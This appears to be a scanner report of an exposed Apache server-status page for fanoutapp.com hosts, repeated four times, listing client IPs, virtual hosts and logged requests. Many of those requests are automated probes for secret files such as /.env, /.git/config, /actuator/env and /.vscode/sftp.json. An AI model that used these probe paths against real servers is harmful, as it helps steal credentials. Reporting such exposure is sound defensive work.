0.642334040.00.040.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2320337670/22/205_ 0.642732130.00.040.52 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-2320337670/19/218_ 0.642730020.00.150.70 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-2320337670/22/207_ 0.642331180.00.030.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-2320337670/20/214_ 0.641427280.00.040.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-2320337670/22/206_ 0.651425650.00.050.51 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-23
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfbcb94f24
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 02-Feb-2025 03:51:27 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 5 hours 12 minutes 30 seconds Server load: 0.22 0.27 0.20 Total accesses: 21797 - Total Traffic: 61.0 MB - Total Duration: 342741 CPU Usage: u31.63 s55.41 cu444.64 cs168.77 - .0365% CPU load .0114 requests/sec - 33 B/second - 2932 B/request - 15.7242 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02033768no0yes124000 12033767no0yes025000 Sum200 149000 ___W______________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2320337680/2/346_ 0.070365700.00.000.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2320337680/2/353_ 0.070366790.00.001.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2320337680/3/346_ 0.070453520.00.001.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-23203376810/1/375W 0.010061890.00.000.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2320337680/2/328_ 0.051419053960.00.010.64 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2320337680/2/365_ 0.053705658380.00.000.95 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/1/356_ 0.023700848640.00.001.05 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/2/362_ 0.053103549280.00.000.86 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/1/339_ 0.0230981058920.00.001.20 103.218.241.7http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 0-2320337680/2/370_ 0.052269755580.00.000.99 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/1/331_ 0.022264050330.00.000.94 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2320337680/2/363_ 0.052065759650.00.001.05 167.94.138.162http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/1/340_ 0.022060555590.00.000.71 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/1/364_ 0.042060961740.00.001.03 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/2/360_ 0.052040560690.00.001.02 167.94.138.162http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-2320337680/1/351_ 0.041414959260.00.000.98 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/2/344_ 0.070368030.00.000.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2320337680/1/345_ 0.042037243160.00.000.95 140.248.73.64http/1.1api.hnstream.com:8000GET /comments/items/ HTTP/1.1 0-2320337680/2/360_ 0.05981050770.00.001.09 127.0.0.1http/1.1hnstream.com:8000POST /wp-json/litespeed/v1/cdn_status HTTP/1.1 0-2320337680/1/350_ 0.04976654010.00.000.74 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/2/358_ 0.0702657480.00.010.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2320337680/2/362_ 0.070449960.00.000.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2320337680/2/337_ 0.070357300.00.000.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2320337680/2/373_ 0.070350140.00.000.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2320337680/2/352_ 0.070357750.00.001.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2320337670/3/203_ 0.0889539440.00.000.64 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/2/191_ 0.09020339860.00.000.45 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-2320337670/5/190_ 0.090530680.00.010.60 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2320337670/2/189_ 0.100927740.00.010.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-2320337670/5/207_ 0.100539580.00.010.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2320337670/2/203_ 0.100732950.00.000.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 1-2320337670/3/209_ 0.082503638060.00.000.84 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/2/186_ 0.0524982730890.00.010.57 140.248.90.31http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor: HTTP/1.1 1-2320337670/3/188_ 0.082047128490.00.010.40 167.94.138.162http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2320337670/3/187_ 0.0720441738280.00.000.78 167.94.138.162http/1.1 1-2320337670/2/192_ 0.081935039040.00.000.79 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-2320337670/2/186_ 0.061930634240.00.000.63 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/198_ 0.081898622440.00.000.50 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/2/188_ 0.061893622980.00.000.70 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/4/207_ 0.081668634200.00.010.62 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/2/181_ 0.071663033130.00.000.54 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2320337670/2/209_ 0.091296729710.00.000.61 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/196_ 0.071291634780.00.000.86 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/2/201_ 0.091066633060.00.000.73 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/186_ 0.071061331250.00.000.49 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2320337670/2/201_ 0.09695628800.00.000.56 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/188_ 0.07690030430.00.010.68 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2320337670/2/196_ 0.09417625860.00.000.79 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/187_ 0.08412124840.00.000.47 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2320337670/3/204_ 0.0994629760.00.010.55 157.52.72.68http/1.1api.livecounter.org:8000<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf60754eeb
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 30-Jan-2025 17:18:27 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 19 days 18 hours 39 minutes 30 seconds Server load: 0.20 0.20 0.18 Total accesses: 19230 - Total Traffic: 54.5 MB - Total Duration: 262405 CPU Usage: u28.4 s49.58 cu375.05 cs143.5 - .0349% CPU load .0113 requests/sec - 33 B/second - 2973 B/request - 13.6456 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01755020no0yes025000 11784894no0yes124000 21755021no0yes025000 Sum300 174000 ______________________________________________W_________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2017550200/15/311_ 0.402183255070.00.030.64 157.52.72.26http/1.1api.livecounter.org:8000GET /new/.env HTTP/1.1 0-2017550200/10/317_ 0.422188645960.00.021.13 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2017550200/12/311_ 0.441438710.00.030.96 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-2017550200/12/342_ 0.440743860.00.100.86 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-2017550200/15/298_ 0.42357642820.00.100.58 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/11/330_ 0.432446860.00.030.88 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2017550200/11/326_ 0.4241136780.00.020.99 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2017550200/8/327_ 0.36352437080.00.010.80 127.0.0.1http/1.1api.hnstream.com:8000GET /geoip/ HTTP/1.1 0-2017550200/13/311_ 0.432249290.00.021.15 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2017550200/11/336_ 0.352788444740.00.030.86 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /jquery.filer/php/readme.txt HTTP/1.1 0-2017550200/12/298_ 0.440438680.00.030.88 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-2017550200/12/329_ 0.421288847830.00.030.98 165.232.107.236http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2017550200/12/309_ 0.440842880.00.030.64 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-2017550200/12/333_ 0.4241145130.00.050.98 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-2017550200/18/325_ 0.433448290.00.030.97 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2017550200/11/321_ 0.423647010.00.030.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2017550200/12/313_ 0.431856300.00.020.79 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-2017550200/13/312_ 0.433831900.00.020.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-2017550200/10/329_ 0.4411038150.00.021.03 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-2017550200/13/319_ 0.440441810.00.030.67 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-2017550200/13/326_ 0.441744200.00.020.78 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-2017550200/9/327_ 0.432838050.00.020.80 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-2017550200/10/306_ 0.361288645550.00.020.87 165.232.107.236http/1.1 0-2017550200/14/336_ 0.4245038720.00.020.90 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-2017550200/12/321_ 0.433446110.00.101.15 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2017848940/8/175_ 0.293422190.00.020.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2017848940/5/165_ 0.201288131320.00.010.40 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2017848940/8/154_ 0.291219621530.00.020.53 157.52.74.62http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2017848940/7/158_ 0.2912883120370.00.010.39 165.232.107.236http/1.1api.hnstream.com:8000\x16\x03\x01 1-2017848940/9/172_ 0.301321200.00.120.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2017848940/8/171_ 0.291288126100.00.020.59 165.232.107.236http/1.1api.hnstream.com:8000\x16\x03\x01 1-2017848940/8/175_ 0.2933025230.00.020.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/8/160_ 0.29335623540.00.020.52 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2017848940/6/153_ 0.2712881022380.00.010.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/8/160_ 0.271288330870.00.010.73 165.232.107.236http/1.1 1-2017848940/8/157_ 0.25330621080.00.020.71 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2017848940/7/157_ 0.2912881523890.00.020.57 165.232.107.236http/1.1api.hnstream.com:8000GET /login HTTP/1.1 1-2017848940/9/165_ 0.271288415600.00.010.44 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 1-2017848940/6/159_ 0.261288415000.00.010.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/9/173_ 0.29141127500.00.090.55 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2017848940/7/153_ 0.300322520.00.020.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2017848940/7/175_ 0.251214119740.00.020.54 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2017848940/7/166_ 0.25136726240.00.090.68 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2017848940/7/170_ 0.302328260.00.020.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2017848940/6/153_ 0.2615793123180.00.010.42 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/9/172_ 0.301419710.00.020.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-20178489410/7/159W 0.280023200.00.010.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2017848940/6/163_ 0.300318540.00.080.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2017848940/9/159_ 0.302317960.00.020.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2017848940/7/171_ 0.2923
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf578544ef
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 28-Jan-2025 18:29:37 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 17 days 19 hours 50 minutes 40 seconds Server load: 0.16 0.18 0.18 Total accesses: 16966 - Total Traffic: 46.8 MB - Total Duration: 176075 CPU Usage: u25.54 s44.23 cu326.89 cs126.85 - .034% CPU load .011 requests/sec - 31 B/second - 2892 B/request - 10.3781 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01566288no0yes025000 21566289no0yes124000 Sum200 149000 _________________________.........................___________W__ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1815662880/21/271_ 0.583231239940.00.050.53 157.52.72.75http/1.1api.livecounter.org:8000GET /new/.env.local HTTP/1.1 0-1815662880/20/285_ 0.58341033560.00.051.07 127.0.0.1http/1.1hnstream.com:8000GET /favicon.ico HTTP/1.1 0-1815662880/21/273_ 0.58340032630.00.060.87 127.0.0.1http/1.1hnstream.com:8000GET /static/knockout-extensions.js HTTP/1.1 0-1815662880/27/307_ 0.61649230650.00.060.70 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-1815662880/21/260_ 0.623981630360.00.040.44 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1815662880/24/294_ 0.60393234360.00.130.80 157.52.72.51http/1.1api.livecounter.org:8000GET /laravel/.env.production HTTP/1.1 0-1815662880/19/289_ 0.60644227750.00.050.91 157.52.72.69http/1.1api.livecounter.org:8000GET /nginx/.env HTTP/1.1 0-1815662880/20/296_ 0.6325325750.00.050.74 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-1815662880/21/273_ 0.6311037620.00.060.99 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-1815662880/23/301_ 0.63822032250.00.050.70 147.78.47.161http/1.1api.hnstream.com:8000\x03 0-1815662880/21/262_ 0.5882517300.00.050.79 157.52.96.90http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:42855210 HTTP/1.1 0-1815662880/18/289_ 0.6311334700.00.050.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-1815662880/22/272_ 0.630933960.00.060.55 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-1815662880/23/295_ 0.6127731127240.00.060.88 159.203.24.141http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-1815662880/19/278_ 0.623452534050.00.050.87 104.156.83.132http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-1815662880/22/284_ 0.612376034550.00.060.75 127.0.0.1http/1.1hnstream.com:8000GET /sitemaps.xml HTTP/1.1 0-1815662880/23/278_ 0.630438420.00.060.64 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1815662880/22/274_ 0.613236322850.00.060.74 157.52.72.46http/1.1api.livecounter.org:8000GET /_profiler/phpinfo HTTP/1.1 0-1815662880/17/292_ 0.582773225980.00.040.94 159.203.24.141http/1.1 0-1815662880/22/283_ 0.602371329260.00.050.52 157.52.72.68http/1.1api.livecounter.org:8000GET /docker/app/.env HTTP/1.1 0-1815662880/27/292_ 0.62346931380.00.060.70 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-1815662880/23/294_ 0.611600730150.00.050.71 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1815662880/19/270_ 0.601595227850.00.040.72 157.52.72.34http/1.1api.livecounter.org:8000GET /mail/.env HTTP/1.1 0-1815662880/22/299_ 0.6122011128830.00.120.74 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1815662880/20/287_ 0.602196228490.00.051.00 157.52.72.60http/1.1api.livecounter.org:8000GET /lara/phpinfo.php HTTP/1.1 1-14-0/0/167. 0.00325758614230.00.000.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/160. 0.00325758323700.00.000.39 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/actuator/env HTTP/1.1 1-14-0/0/146. 0.00325758313000.00.000.52 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-14-0/0/151. 0.00325758312110.00.000.38 127.0.0.1http/1.1api.hnstream.com:8000GET /settings/.env HTTP/1.1 1-14-0/0/163. 0.00325758612990.00.000.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/163. 0.00325758418570.00.000.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-14-0/0/167. 0.00325758616820.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00325758315680.00.000.50 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/env HTTP/1.1 1-14-0/0/147. 0.00325758714760.00.000.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00325758722770.00.000.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/149. 0.00325758312890.00.000.69 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php.bak HTTP/1.1 1-14-0/0/150. 0.00325758416070.00.000.55 127.0.0.1http/1.1api.hnstream.com:8000GET /new/.env HTTP/1.1 1-14-0/0/156. 0.0032575808020.00.000.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-14-0/0/153. 0.0032575837450.00.000.63 127.0.0.1http/1.1api.hnstream.com:8000GET /src/.env HTTP/1.1 1-14-0/0/164. 0.00325758319300.00.000.46 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env HTTP/1.1 1-14-0/0/146. 0.00325758314590.00.000.45 127.0.0.1http/1.1api.hnstream.com:8000GET /config/settings.env HTTP/1.1 1-14-0/0/168. 0.00325758512090.00.000.53 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php HTTP/1.1 1-14-0/0/159. 0.00325758318370.00.000.60 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php HTTP/1.1 1-14-0/0/163. 0.00325758720100.00.000.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/147. 0.00325758313860.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /app/env HTTP/1.1 1-14-0/0/163. 0.00325758411490.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /config/actuator/env HTTP/1.1 1-14-0/0/152. 0.00325758415250.00.000.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-14-0/0/157. 0.00325758310690.00.000.56 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env HTTP/1.1 1-14-0/0/150. 0.0032575839730.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.old HTTP/1.1 1-14-0/0/164. 0.00</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfbbc5a68f
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 26-Jan-2025 23:01:43 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 17 Parent Server MPM Generation: 16 Server uptime: 16 days 22 minutes 46 seconds Server load: 0.13 0.19 0.18 Total accesses: 15547 - Total Traffic: 43.3 MB - Total Duration: 157333 CPU Usage: u22.97 s39.77 cu284.64 cs111.25 - .0331% CPU load .0112 requests/sec - 32 B/second - 2917 B/request - 10.1198 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01380494no0yes124000 21380495no0yes025000 Sum200 149000 ____________W____________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1613804940/28/237_ 0.81762236690.00.040.46 198.235.24.124http/1.1 0-1613804940/31/251_ 0.801025530950.00.041.00 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1613804940/23/238_ 0.83426528820.00.040.72 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1613804940/31/268_ 0.81421528370.00.130.62 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1613804940/26/225_ 0.8322827190.00.040.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-1613804940/31/252_ 0.832430810.00.040.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-1613804940/24/256_ 0.832325410.00.110.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-1613804940/31/266_ 0.831317770.00.040.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-1613804940/24/236_ 0.831323830.00.040.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1613804940/34/262_ 0.841323400.00.120.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-1613804940/31/231_ 0.840315370.00.040.73 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-1613804940/28/258_ 0.840331160.00.130.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-16138049410/29/238W 0.790030600.00.070.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1613804940/26/256_ 0.840323000.00.130.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1613804940/26/244_ 0.8221282927400.00.040.80 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-1613804940/25/249_ 0.762123830920.00.110.67 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 0-1613804940/30/238_ 0.832091334070.00.050.47 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-1613804940/25/239_ 0.832089319330.00.040.66 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-1613804940/26/261_ 0.802084524390.00.040.87 140.248.73.29http/1.1api.hnstream.com:8000GET /news/items/ HTTP/1.1 0-1613804940/25/247_ 0.831685026790.00.040.45 127.0.0.1http/1.1hnstream.com:8000GET /xmlrpc.php HTTP/1.1 0-1613804940/28/251_ 0.8016801523750.00.030.61 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-1613804940/27/257_ 0.831148122790.00.050.64 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-1613804940/30/235_ 0.8011434025490.00.050.65 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-1613804940/26/265_ 0.8310301925350.00.040.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-1613804940/28/251_ 0.837621825870.00.120.92 198.235.24.124http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-14-0/0/167. 0.00169284614230.00.000.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/160. 0.00169284323700.00.000.39 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/actuator/env HTTP/1.1 1-14-0/0/146. 0.00169284313000.00.000.52 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-14-0/0/151. 